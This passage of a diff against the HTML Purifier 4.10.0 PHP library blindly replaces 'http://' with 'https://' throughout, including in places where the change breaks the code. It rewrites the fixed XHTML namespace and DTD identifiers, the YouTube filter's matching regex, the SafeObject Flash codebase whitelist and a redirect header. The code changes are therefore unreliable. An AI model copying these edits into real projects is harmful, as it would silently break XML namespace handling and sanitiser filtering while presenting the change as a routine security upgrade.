href="http://byfiles.storage.msn.com/x1pMvt0I80jTgT6DuaCpEMbprX3nk3jNv_vjigxV_EYVSMyM_PKgEvDEUtuNhQC-F-23mTTcKyqx6eGaeK2e_wMJ0ikwpDdFntk4SY7pfJUv2g2Ck6R2S2vAA?download">+</A></DIV>
href="https://byfiles.storage.msn.com/x1pMvt0I80jTgT6DuaCpEMbprX3nk3jNv_vjigxV_EYVSMyM_PKgEvDEUtuNhQC-F-23mTTcKyqx6eGaeK2e_wMJ0ikwpDdFntk4SY7pfJUv2g2Ck6R2S2vAA?download">+</A></DIV>
<DIV
title="Click here to view the full image using the online photo viewer."
style="DISPLAY: inline; OVERFLOW: hidden; WIDTH: 140px; HEIGHT: 140px"><A
href="http://g.msn.com/5meen_us/171?path=/photomail/{6fc0065f-ffdd-4ca6-9a4c-cc5a93dc122f}&amp;image=47D7B182CFEFB10!127&amp;imagehi=47D7B182CFEFB10!125&amp;CID=323550092004883216"
href="https://g.msn.com/5meen_us/171?path=/photomail/{6fc0065f-ffdd-4ca6-9a4c-cc5a93dc122f}&amp;image=47D7B182CFEFB10!127&amp;imagehi=47D7B182CFEFB10!125&amp;CID=323550092004883216"
border="0"><IMG
style="MARGIN-TOP: 15px; DISPLAY: inline-block; MARGIN-LEFT: 0px"
height=109 src="cid:006A71303B80404E9FB6184E55D6A446@wc" width=140
@@ -70,5 +70,5 @@ style="PADDING-RIGHT: 5px; PADDING-LEFT: 7px; PADDING-BOTTOM: 2px; WIDTH: 100%;
style="BORDER-TOP: #dddddd 1px solid; FONT-SIZE: 10pt; MARGIN-BOTTOM: 10px; WIDTH: 100%; COLOR: #909090; MARGIN-RIGHT: 10px; PADDING-TOP: 9px; FONT-FAMILY: Verdana; HEIGHT: 42px; BACKGROUND-COLOR: #ffffff"><NOBR><SPAN
title="Join Windows Live to share photos using Windows Live Photo E-mail.">Online
pictures are available for 30 days. <A style="COLOR: #0088e4"
href="http://g.msn.com/5meen_us/175">Get Windows Live Mail desktop to create
href="https://g.msn.com/5meen_us/175">Get Windows Live Mail desktop to create
your own photo e-mails. </A></SPAN></NOBR></DIV></BODY></HTML>

4
htmlpurifier-4.10.0/extras/FSTools.php
View File

@@ -58,7 +58,7 @@ class FSTools
/**
* Copy a file, or recursively copy a folder and its contents; modified
* so that copied files, if PHP, have includes removed
* @note Adapted from http://aidanlister.com/repos/v/function.copyr.php
* @note Adapted from https://aidanlister.com/repos/v/function.copyr.php
*/
public function copyr($source, $dest)
{
@@ -103,7 +103,7 @@ class FSTools
/**
* Delete a file, or a folder and its contents
* @note Adapted from http://aidanlister.com/repos/v/function.rmdirr.php
* @note Adapted from https://aidanlister.com/repos/v/function.rmdirr.php
*/
public function rmdirr($dirname)
{

2
htmlpurifier-4.10.0/library/HTMLPurifier/AttrDef.php
View File

@@ -40,7 +40,7 @@ abstract class HTMLPurifier_AttrDef
* Convenience method that parses a string as if it were CDATA.
*
* This method process a string in the manner specified at
* <http://www.w3.org/TR/html4/types.html#h-6.2> by removing
* <https://www.w3.org/TR/html4/types.html#h-6.2> by removing
* leading and trailing whitespace, ignoring line feeds, and replacing
* carriage returns and tabs with spaces. While most useful for HTML
* attributes specified as CDATA, it can also be applied to most CSS

6
htmlpurifier-4.10.0/library/HTMLPurifier/AttrDef/CSS/FontFamily.php
View File

@@ -127,11 +127,11 @@ class HTMLPurifier_AttrDef_CSS_FontFamily extends HTMLPurifier_AttrDef
// show up in non-Western pages and are supported by most
// major browsers, for example: " 明朝" is a
// legitimate font-name
// <http://ja.wikipedia.org/wiki/MS_明朝>. See
// <https://ja.wikipedia.org/wiki/MS_明朝>. See
// the CSS3 spec for more examples:
// <http://www.w3.org/TR/2011/WD-css3-fonts-20110324/localizedfamilynames.png>
// <https://www.w3.org/TR/2011/WD-css3-fonts-20110324/localizedfamilynames.png>
// You can see live samples of these on the Internet:
// <http://www.google.co.jp/search?q=font-family++明朝|ゴシック>
// <https://www.google.co.jp/search?q=font-family++明朝|ゴシック>
// However, most of these fonts have ASCII equivalents:
// for example, 'MS Mincho', and it's considered
// professional to use ASCII font names instead of

2
htmlpurifier-4.10.0/library/HTMLPurifier/AttrDef/CSS/URI.php
View File

@@ -1,7 +1,7 @@
<?php
/**
* Validates a URI in CSS syntax, which uses url('http://example.com')
* Validates a URI in CSS syntax, which uses url('https://example.com')
* @note While theoretically speaking a URI in a CSS document could
* be non-embedded, as of CSS2 there is no such usage so we're
* generalizing it. This may need to be changed in the future.

2
htmlpurifier-4.10.0/library/HTMLPurifier/AttrDef/HTML/Pixels.php
View File

@@ -48,7 +48,7 @@ class HTMLPurifier_AttrDef_HTML_Pixels extends HTMLPurifier_AttrDef
}
// upper-bound value, extremely high values can
// crash operating systems, see <http://ha.ckers.org/imagecrash.html>
// crash operating systems, see <https://ha.ckers.org/imagecrash.html>
// WARNING, above link WILL crash you if you're using Windows
if ($this->max !== null && $int > $this->max) {

2
htmlpurifier-4.10.0/library/HTMLPurifier/AttrDef/URI/Email/SimpleCheck.php
View File

@@ -2,7 +2,7 @@
/**
* Primitive email validation class based on the regexp found at
* http://www.regular-expressions.info/email.html
* https://www.regular-expressions.info/email.html
*/
class HTMLPurifier_AttrDef_URI_Email_SimpleCheck extends HTMLPurifier_AttrDef_URI_Email
{

2
htmlpurifier-4.10.0/library/HTMLPurifier/Config.php
View File

@@ -595,7 +595,7 @@ class HTMLPurifier_Config
'modify your code to use maybeGetRawDefinition, and test if the returned ' .
'value is null before making any edits (if it is null, that means that a ' .
'cached version is available, and no raw operations are necessary). See ' .
'<a href="http://htmlpurifier.org/docs/enduser-customize.html#optimized">' .
'<a href="https://htmlpurifier.org/docs/enduser-customize.html#optimized">' .
'Customize</a> for more details',
E_USER_WARNING
);

2
htmlpurifier-4.10.0/library/HTMLPurifier/ConfigSchema/Builder/Xml.php
View File

@@ -26,7 +26,7 @@ class HTMLPurifier_ConfigSchema_Builder_Xml extends XMLWriter
$purifier = HTMLPurifier::getInstance();
$html = $purifier->purify($html);
$this->writeAttribute('xmlns', 'http://www.w3.org/1999/xhtml');
$this->writeAttribute('xmlns', 'https://www.w3.org/1999/xhtml');
$this->writeRaw($html);
$this->endElement(); // div

4
htmlpurifier-4.10.0/library/HTMLPurifier/ConfigSchema/schema/AutoFormat.DisplayLinkURI.txt
View File

@@ -5,7 +5,7 @@ DEFAULT: false
--DESCRIPTION--
<p>
This directive turns on the in-text display of URIs in &lt;a&gt; tags, and disables
those links. For example, <a href="http://example.com">example</a> becomes
example (<a>http://example.com</a>).
those links. For example, <a href="https://example.com">example</a> becomes
example (<a>https://example.com</a>).
</p>
--# vim: et sw=4 sts=4

4
htmlpurifier-4.10.0/library/HTMLPurifier/ConfigSchema/schema/Filter.ExtractStyleBlocks.txt
View File

@@ -20,8 +20,8 @@ EXTERNAL: CSSTidy
echo '<?xml version="1.0" encoding="UTF-8"?>';
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
"https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="https://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<title>Filter.ExtractStyleBlocks</title>
<?php

2
htmlpurifier-4.10.0/library/HTMLPurifier/ConfigSchema/schema/Filter.YouTube.txt
View File

@@ -10,7 +10,7 @@ DEFAULT: false
</p>
<p>
This directive enables YouTube video embedding in HTML Purifier. Check
<a href="http://htmlpurifier.org/docs/enduser-youtube.html">this document
<a href="https://htmlpurifier.org/docs/enduser-youtube.html">this document
on embedding videos</a> for more information on what this filter does.
</p>
--# vim: et sw=4 sts=4

2
htmlpurifier-4.10.0/library/HTMLPurifier/ConfigSchema/schema/HTML.AllowedElements.txt
View File

@@ -14,7 +14,7 @@ DEFAULT: NULL
If you attempt to allow an element that HTML Purifier does not know
about, HTML Purifier will raise an error. You will need to manually
tell HTML Purifier about this element by using the
<a href="http://htmlpurifier.org/docs/enduser-customize.html">advanced customization features.</a>
<a href="https://htmlpurifier.org/docs/enduser-customize.html">advanced customization features.</a>
</p>
<p>
<strong>Warning:</strong> If another directive conflicts with the

2
htmlpurifier-4.10.0/library/HTMLPurifier/ConfigSchema/schema/URI.Munge.txt
View File

@@ -9,7 +9,7 @@ DEFAULT: NULL
absolute URIs into another URI, usually a URI redirection service.
This directive accepts a URI, formatted with a <code>%s</code> where
the url-encoded original URI should be inserted (sample:
<code>http://www.google.com/url?q=%s</code>).
<code>https://www.google.com/url?q=%s</code>).
</p>
<p>
Uses for this directive:

6
htmlpurifier-4.10.0/library/HTMLPurifier/ConfigSchema/schema/URI.SafeIframeRegexp.txt
View File

@@ -10,9 +10,9 @@ DEFAULT: NULL
%HTML.SafeIframe is enabled. Here are some example values:
</p>
<ul>
<li><code>%^http://www.youtube.com/embed/%</code> - Allow YouTube videos</li>
<li><code>%^http://player.vimeo.com/video/%</code> - Allow Vimeo videos</li>
<li><code>%^http://(www.youtube.com/embed/|player.vimeo.com/video/)%</code> - Allow both</li>
<li><code>%^https://www.youtube.com/embed/%</code> - Allow YouTube videos</li>
<li><code>%^https://player.vimeo.com/video/%</code> - Allow Vimeo videos</li>
<li><code>%^https://(www.youtube.com/embed/|player.vimeo.com/video/)%</code> - Allow both</li>
</ul>
<p>
Note that this directive does not give you enough granularity to, say, disable

6
htmlpurifier-4.10.0/library/HTMLPurifier/Encoder.php
View File

@@ -120,7 +120,7 @@ class HTMLPurifier_Encoder
* UTF-8 representations.
*
* @note Fallback code adapted from utf8ToUnicode by Henri Sivonen and
* hsivonen@iki.fi at <http://iki.fi/hsivonen/php-utf8/> under the
* hsivonen@iki.fi at <https://iki.fi/hsivonen/php-utf8/> under the
* LGPL license. Notes on what changed are inside, but in general,
* the original code transformed UTF-8 text into an array of integer
* Unicode codepoints. Understandably, transforming that back to
@@ -289,7 +289,7 @@ class HTMLPurifier_Encoder
/**
* Translates a Unicode codepoint into its corresponding UTF-8 character.
* @note Based on Feyd's function at
* <http://forums.devnetwork.net/viewtopic.php?p=191404#191404>,
* <https://forums.devnetwork.net/viewtopic.php?p=191404#191404>,
* which is in public domain.
* @note While we're going to do code point parsing anyway, a good
* optimization would be to refuse to translate code points that
@@ -408,7 +408,7 @@ class HTMLPurifier_Encoder
} else {
trigger_error(
'You have a buggy version of iconv, see https://bugs.php.net/bug.php?id=48147 ' .
'and http://sourceware.org/bugzilla/show_bug.cgi?id=13541',
'and https://sourceware.org/bugzilla/show_bug.cgi?id=13541',
E_USER_ERROR
);
}

2
htmlpurifier-4.10.0/library/HTMLPurifier/EntityParser.php
View File

@@ -35,7 +35,7 @@ class HTMLPurifier_EntityParser
public function __construct() {
// From
// http://stackoverflow.com/questions/15532252/why-is-reg-being-rendered-as-without-the-bounding-semicolon
// https://stackoverflow.com/questions/15532252/why-is-reg-being-rendered-as-without-the-bounding-semicolon
$semi_optional = "quot|QUOT|lt|LT|gt|GT|amp|AMP|AElig|Aacute|Acirc|Agrave|Aring|Atilde|Auml|COPY|Ccedil|ETH|Eacute|Ecirc|Egrave|Euml|Iacute|Icirc|Igrave|Iuml|Ntilde|Oacute|Ocirc|Ograve|Oslash|Otilde|Ouml|REG|THORN|Uacute|Ucirc|Ugrave|Uuml|Yacute|aacute|acirc|acute|aelig|agrave|aring|atilde|auml|brvbar|ccedil|cedil|cent|copy|curren|deg|divide|eacute|ecirc|egrave|eth|euml|frac12|frac14|frac34|iacute|icirc|iexcl|igrave|iquest|iuml|laquo|macr|micro|middot|nbsp|not|ntilde|oacute|ocirc|ograve|ordf|ordm|oslash|otilde|ouml|para|plusmn|pound|raquo|reg|sect|shy|sup1|sup2|sup3|szlig|thorn|times|uacute|ucirc|ugrave|uml|uuml|yacute|yen|yuml";
// NB: three empty captures to put the fourth match in the right

2
htmlpurifier-4.10.0/library/HTMLPurifier/Filter/ExtractStyleBlocks.php
View File

@@ -112,7 +112,7 @@ class HTMLPurifier_Filter_ExtractStyleBlocks extends HTMLPurifier_Filter
/**
* Takes CSS (the stuff found in <style>) and cleans it.
* @warning Requires CSSTidy <http://csstidy.sourceforge.net/>
* @warning Requires CSSTidy <https://csstidy.sourceforge.net/>
* @param string $css CSS styling to clean
* @param HTMLPurifier_Config $config
* @param HTMLPurifier_Context $context

2
htmlpurifier-4.10.0/library/HTMLPurifier/Filter/YouTube.php
View File

@@ -17,7 +17,7 @@ class HTMLPurifier_Filter_YouTube extends HTMLPurifier_Filter
public function preFilter($html, $config, $context)
{
$pre_regex = '#<object[^>]+>.+?' .
'(?:http:)?//www.youtube.com/((?:v|cp)/[A-Za-z0-9\-_=]+).+?</object>#s';
'(?:https:)?//www.youtube.com/((?:v|cp)/[A-Za-z0-9\-_=]+).+?</object>#s';
$pre_replace = '<span class="youtube-embed">\1</span>';
return preg_replace($pre_regex, $pre_replace, $html);
}

4
htmlpurifier-4.10.0/library/HTMLPurifier/Generator.php
View File

@@ -195,7 +195,7 @@ class HTMLPurifier_Generator
if (!$token instanceof HTMLPurifier_Token_Text) {
return $this->generateFromToken($token);
}
// Thanks <http://lachy.id.au/log/2005/05/script-comments>
// Thanks <https://lachy.id.au/log/2005/05/script-comments>
$data = preg_replace('#//\s*$#', '', $token->data);
return '<!--//--><![CDATA[//><!--' . "\n" . trim($data) . "\n" . '//--><!]]>';
}
@@ -275,7 +275,7 @@ class HTMLPurifier_Generator
public function escape($string, $quote = null)
{
// Workaround for APC bug on Mac Leopard reported by sidepodcast
// http://htmlpurifier.org/phorum/read.php?3,4823,4846
// https://htmlpurifier.org/phorum/read.php?3,4823,4846
if ($quote === null) {
$quote = ENT_COMPAT;
}

2
htmlpurifier-4.10.0/library/HTMLPurifier/HTMLModule/SafeObject.php
View File

@@ -36,7 +36,7 @@ class HTMLPurifier_HTMLModule_SafeObject extends HTMLPurifier_HTMLModule
'data' => 'URI#embedded',
'codebase' => new HTMLPurifier_AttrDef_Enum(
array(
'http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0'
'https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0'
)
),
)

10
htmlpurifier-4.10.0/library/HTMLPurifier/HTMLModuleManager.php
View File

@@ -99,7 +99,7 @@ class HTMLPurifier_HTMLModuleManager
array('Tidy_Transitional', 'Tidy_Proprietary'),
array(),
'-//W3C//DTD HTML 4.01 Transitional//EN',
'http://www.w3.org/TR/html4/loose.dtd'
'https://www.w3.org/TR/html4/loose.dtd'
);
$this->doctypes->register(
@@ -109,7 +109,7 @@ class HTMLPurifier_HTMLModuleManager
array('Tidy_Strict', 'Tidy_Proprietary', 'Tidy_Name'),
array(),
'-//W3C//DTD HTML 4.01//EN',
'http://www.w3.org/TR/html4/strict.dtd'
'https://www.w3.org/TR/html4/strict.dtd'
);
$this->doctypes->register(
@@ -119,7 +119,7 @@ class HTMLPurifier_HTMLModuleManager
array('Tidy_Transitional', 'Tidy_XHTML', 'Tidy_Proprietary', 'Tidy_Name'),
array(),
'-//W3C//DTD XHTML 1.0 Transitional//EN',
'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'
'https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'
);
$this->doctypes->register(
@@ -129,7 +129,7 @@ class HTMLPurifier_HTMLModuleManager
array('Tidy_Strict', 'Tidy_XHTML', 'Tidy_Strict', 'Tidy_Proprietary', 'Tidy_Name'),
array(),
'-//W3C//DTD XHTML 1.0 Strict//EN',
'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'
'https://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'
);
$this->doctypes->register(
@@ -141,7 +141,7 @@ class HTMLPurifier_HTMLModuleManager
array('Tidy_Strict', 'Tidy_XHTML', 'Tidy_Proprietary', 'Tidy_Strict', 'Tidy_Name'), // Tidy_XHTML1_1
array(),
'-//W3C//DTD XHTML 1.1//EN',
'http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd'
'https://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd'
);
}

2
htmlpurifier-4.10.0/library/HTMLPurifier/Lexer/PH5P.php
View File

@@ -44,7 +44,7 @@ class HTMLPurifier_Lexer_PH5P extends HTMLPurifier_Lexer_DOMLex
/*
Copyright 2007 Jeroen van der Meer <http://jero.net/>
Copyright 2007 Jeroen van der Meer <https://jero.net/>
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the

2
htmlpurifier-4.10.0/library/HTMLPurifier/TagTransform/Font.php
View File

@@ -9,7 +9,7 @@
*
* @note Size is an interesting case because it doesn't map cleanly to CSS.
* Thanks to
* http://style.cleverchimp.com/font_size_intervals/altintervals.html
* https://style.cleverchimp.com/font_size_intervals/altintervals.html
* for reasonable mappings.
* @warning This doesn't work completely correctly; specifically, this
* TagTransform operates before well-formedness is enforced, so

14
htmlpurifier-4.10.0/library/HTMLPurifier/URI.php
View File

@@ -153,7 +153,7 @@ class HTMLPurifier_URI
$segments_encoder = new HTMLPurifier_PercentEncoder($chars_pchar . '/');
if (!is_null($this->host)) { // this catches $this->host === ''
// path-abempty (hier and relative)
// http://www.example.com/my/path
// https://www.example.com/my/path
// //www.example.com/my/path (looks odd, but works, and
// recognized by most browsers)
// (this set is valid or invalid on a scheme by scheme
@@ -164,12 +164,12 @@ class HTMLPurifier_URI
} elseif ($this->path !== '') {
if ($this->path[0] === '/') {
// path-absolute (hier and relative)
// http:/my/path
// https:/my/path
// /my/path
if (strlen($this->path) >= 2 && $this->path[1] === '/') {
// This could happen if both the host gets stripped
// out
// http://my/path
// https://my/path
// //my/path
$this->path = '';
} else {
@@ -177,7 +177,7 @@ class HTMLPurifier_URI
}
} elseif (!is_null($this->scheme)) {
// path-rootless (hier)
// http:my/path
// https:my/path
// Short circuit evaluation means we don't need to check nz
$this->path = $segments_encoder->encode($this->path);
} else {
@@ -221,8 +221,8 @@ class HTMLPurifier_URI
// reconstruct authority
$authority = null;
// there is a rendering difference between a null authority
// (http:foo-bar) and an empty string authority
// (http:///foo-bar).
// (https:foo-bar) and an empty string authority
// (https:///foo-bar).
if (!is_null($this->host)) {
$authority = '';
if (!is_null($this->userinfo)) {
@@ -238,7 +238,7 @@ class HTMLPurifier_URI
// One might wonder about parsing quirks from browsers after
// this reconstruction. Unfortunately, parsing behavior depends
// on what *scheme* was employed (file:///foo is handled *very*
// differently than http:///foo), so unfortunately we have to
// differently than https:///foo), so unfortunately we have to
// defer to the schemes to do the right thing.
$result = '';
if (!is_null($this->scheme)) {

2
htmlpurifier-4.10.0/library/HTMLPurifier/URIScheme.php
View File

@@ -72,7 +72,7 @@ abstract class HTMLPurifier_URIScheme
(!is_null($uri->scheme) && ($uri->host === '' || is_null($uri->host))) ||
// if the scheme is not present, a *blank* host is in error,
// since this translates into '///path' which most browsers
// interpret as being 'http://path'.
// interpret as being 'https://path'.
(is_null($uri->scheme) && $uri->host === '')
) {
do {

2
htmlpurifier-4.10.0/phpdoc.ini
View File

@@ -5,7 +5,7 @@
;; command-line switch -c, as in phpdoc -c default.ini or phpdoc -c myini.ini. The web
;; interface will automatically generate a list of .ini files that can be used.
;;
;; default.ini is used to generate the online manual at http://www.phpdoc.org/docs
;; default.ini is used to generate the online manual at https://www.phpdoc.org/docs
;;
;; ALL .ini files must be in the user subdirectory of phpDocumentor with an extension of .ini
;;

8
htmlpurifier-4.10.0/plugins/modx.txt
View File

@@ -1,10 +1,10 @@
MODx Plugin
MODx <http://www.modxcms.com/> is an open source PHP application framework.
MODx <https://www.modxcms.com/> is an open source PHP application framework.
I first came across them in my referrer logs when tillda asked if anyone
could implement an HTML Purifier plugin. This forum thread
<http://modxcms.com/forums/index.php/topic,6604.0.html> eventually resulted
<https://modxcms.com/forums/index.php/topic,6604.0.html> eventually resulted
in the fruition of this plugin that davidm says, "is on top of my favorite
list." HTML Purifier goes great with WYSIWYG editors!
@@ -93,14 +93,14 @@ $purifier = new HTMLPurifier($config);
5. Known Bugs
'rn' characters sometimes mysteriously appear after purification. We are
currently investigating this issue. See: <http://htmlpurifier.org/phorum/read.php?3,1866>
currently investigating this issue. See: <https://htmlpurifier.org/phorum/read.php?3,1866>
6. See Also
A modified version of Jot 1.1.3 is available, which integrates with HTML
Purifier. You can check it out here: <http://modxcms.com/forums/index.php/topic,25621.msg161970.html>
Purifier. You can check it out here: <https://modxcms.com/forums/index.php/topic,25621.msg161970.html>
X. Changelog

2
htmlpurifier-4.10.0/plugins/phorum/INSTALL
View File

@@ -63,7 +63,7 @@ phorum/
5. ENABLE
---------
Navigate to your Phorum admin panel at http://example.com/phorum/admin.php,
Navigate to your Phorum admin panel at https://example.com/phorum/admin.php,
click on Global Settings > Modules, scroll to "HTML Purifier Phorum Mod" and
turn it On.

2
htmlpurifier-4.10.0/plugins/phorum/README
View File

@@ -40,6 +40,6 @@ set $PHORUM['mod_htmlpurifier']['wysiwyg'] to TRUE if you are using a
WYSIWYG editor (you can do this through a common hook or the web
configuration form).
Visit HTML Purifier at <http://htmlpurifier.org/>.
Visit HTML Purifier at <https://htmlpurifier.org/>.
vim: et sw=4 sts=4

2
htmlpurifier-4.10.0/plugins/phorum/htmlpurifier.php
View File

@@ -203,7 +203,7 @@ function phorum_htmlpurifier_quote($array)
/**
* Ensure that our format hook is processed last. Also, loads the library.
* @credits <http://secretsauce.phorum.org/snippets/make_bbcode_last_formatter.php.txt>
* @credits <https://secretsauce.phorum.org/snippets/make_bbcode_last_formatter.php.txt>
*/
function phorum_htmlpurifier_common()
{

2
htmlpurifier-4.10.0/plugins/phorum/info.txt
View File

@@ -1,7 +1,7 @@
title: HTML Purifier Phorum Mod
desc: This module enables standards-compliant HTML filtering on Phorum. Please check migrate.bbcode.php before enabling this mod.
author: Edward Z. Yang
url: http://htmlpurifier.org/
url: https://htmlpurifier.org/
version: 4.0.0
hook: format|phorum_htmlpurifier_format

2
htmlpurifier-4.10.0/plugins/phorum/settings/form.php
View File

@@ -40,7 +40,7 @@ function phorum_htmlpurifier_show_form()
however, make the web configuration interface unavailable.</p>');
require_once 'HTMLPurifier/Printer/ConfigForm.php';
$htmlpurifier_form = new HTMLPurifier_Printer_ConfigForm('config', 'http://htmlpurifier.org/live/configdoc/plain.html#%s');
$htmlpurifier_form = new HTMLPurifier_Printer_ConfigForm('config', 'https://htmlpurifier.org/live/configdoc/plain.html#%s');
$htmlpurifier_form->setTextareaDimensions(23, 7); // widen a little, since we have space
$frm->addMessage($htmlpurifier_form->render(

2
htmlpurifier-4.10.0/plugins/phorum/settings/migrate-sigs.php
View File

@@ -71,7 +71,7 @@ function phorum_htmlpurifier_migrate_sigs($offset)
$uri = rtrim(dirname($_SERVER['PHP_SELF']), '/\\');
$extra = 'admin.php?module=modsettings&mod=htmlpurifier&migrate-sigs=' . $offset;
// relies on output buffering to work
header("Location: http://$host$uri/$extra");
header("Location: https://$host$uri/$extra");
exit;
}

4
htmlpurifier-4.10.0/smoketests/all.php
View File

@@ -7,8 +7,8 @@ echo '<?xml version="1.0" encoding="UTF-8" ?>';
?><!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
"https://www.w3.org/TR/xhtml1/DTD/xhtml1-loose.dtd">
<html xmlns="https://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>HTML Purifier: All Smoketests</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

6
htmlpurifier-4.10.0/smoketests/allConfigForm.php
View File

@@ -15,7 +15,7 @@ $gen_config = HTMLPurifier_Config::createDefault();
$printer_config_form = new HTMLPurifier_Printer_ConfigForm(
'config',
'http://htmlpurifier.org/live/configdoc/plain.html#%s'
'https://htmlpurifier.org/live/configdoc/plain.html#%s'
);
$purifier = new HTMLPurifier($config);
@@ -26,8 +26,8 @@ echo '<?xml version="1.0" encoding="UTF-8" ?>';
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
"https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="https://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<title>HTML Purifier All Config Form smoketest</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

4
htmlpurifier-4.10.0/smoketests/attrTransform.php
View File

@@ -4,8 +4,8 @@ require 'common.php';
?><!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
"https://www.w3.org/TR/xhtml1/DTD/xhtml1-loose.dtd">
<html xmlns="https://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>HTML Purifier Attribute Transformation Smoketest</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

2
htmlpurifier-4.10.0/smoketests/attrTransform.xml
View File

@@ -67,7 +67,7 @@
</group>
<group title="img.border">
<sample><![CDATA[<img src="img.png" alt="I" border="2" />]]></sample>
<sample><![CDATA[<a href="http://example.com/"><img src="img.png" alt="I" border="2" /></a>]]></sample>
<sample><![CDATA[<a href="https://example.com/"><img src="img.png" alt="I" border="2" /></a>]]></sample>
</group>
<group title="td,th,hr.width">
<sample><![CDATA[

8
htmlpurifier-4.10.0/smoketests/basic.php
View File

@@ -19,11 +19,11 @@ echo '<?xml version="1.0" encoding="UTF-8" ?>';
<?php if ($strict) { ?>
<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1- Strict.dtd">
"https://www.w3.org/TR/xhtml1/DTD/xhtml1- Strict.dtd">
<?php } else { ?>
<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-loose.dtd">
"https://www.w3.org/TR/xhtml1/DTD/xhtml1-loose.dtd">
<?php } ?>
<html>
<head>
@@ -44,8 +44,8 @@ if ($page) {
?>
<div style="float:right;"><div><?php echo $strict ? 'Strict' : 'Loose'; ?>:
<a href="?d=<?php echo (int) !$strict; ?>&amp;p=<?php echo $page ?>">Swap</a></div>
<a href="http://validator.w3.org/check?uri=referer"><img
src="http://www.w3.org/Icons/valid-xhtml10"
<a href="https://validator.w3.org/check?uri=referer"><img
src="https://www.w3.org/Icons/valid-xhtml10"
alt="Valid XHTML 1.0 Transitional" height="31" width="88" style="border:0;" /></a>
</div>
<?php

6
htmlpurifier-4.10.0/smoketests/basic/allElements.css
View File

@@ -7,7 +7,7 @@ div > * {background:#F00; color:#FFF; font-weight:bold; padding:0.2em; margin:0.
#module-text abbr,
#module-text acronym,
#module-text div blockquote,
#module-text blockquote[cite='http://www.example.com'],
#module-text blockquote[cite='https://www.example.com'],
#module-text br,
#module-text cite,
#module-text code,
@@ -23,14 +23,14 @@ div > * {background:#F00; color:#FFF; font-weight:bold; padding:0.2em; margin:0.
#module-text p,
#module-text pre,
#module-text span q,
#module-text q[cite='http://www.example.com'],
#module-text q[cite='https://www.example.com'],
#module-text samp,
#module-text strong,
#module-text var,
#module-hypertext span a,
#module-hypertext a[accesskey='q'],
#module-hypertext a[charset='UTF-8'],
#module-hypertext a[href='http://www.example.com/'],
#module-hypertext a[href='https://www.example.com/'],
#module-hypertext a[hreflang='en'],
#module-hypertext a[rel='nofollow'],
#module-hypertext a[rev='index'],

10
htmlpurifier-4.10.0/smoketests/basic/allElements.html
View File

@@ -1,8 +1,8 @@
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
"https://www.w3.org/TR/xhtml1/DTD/xhtml1-loose.dtd">
<html xmlns="https://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>HTML Purifier All Elements Smoketest</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
@@ -33,7 +33,7 @@ otherwise there will be problems.</p>
<abbr>abbr</abbr>
<acronym>acronym</acronym>
<div><blockquote>blockquote</blockquote></div>
<blockquote cite="http://www.example.com">blockquote@cite</blockquote>
<blockquote cite="https://www.example.com">blockquote@cite</blockquote>
<br />
<cite>cite</cite>
<code>code</code>
@@ -49,7 +49,7 @@ otherwise there will be problems.</p>
<p>p</p>
<pre>pre</pre>
<span><q>q</q></span>
<q cite="http://www.example.com">q@cite</q>
<q cite="https://www.example.com">q@cite</q>
<samp>samp</samp>
<strong>strong</strong>
<var>var</var>
@@ -60,7 +60,7 @@ otherwise there will be problems.</p>
<span><a>a</a></span>:
<a accesskey="q">accesskey</a>
<a charset="UTF-8">charset</a>
<a href="http://www.example.com/">href</a>
<a href="https://www.example.com/">href</a>
<a hreflang="en">hreflang</a>
<a rel="nofollow">rel</a>
<a rev="index">rev</a>

4
htmlpurifier-4.10.0/smoketests/basic/legacy.html
View File

@@ -1,8 +1,8 @@
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-loose.dtd">
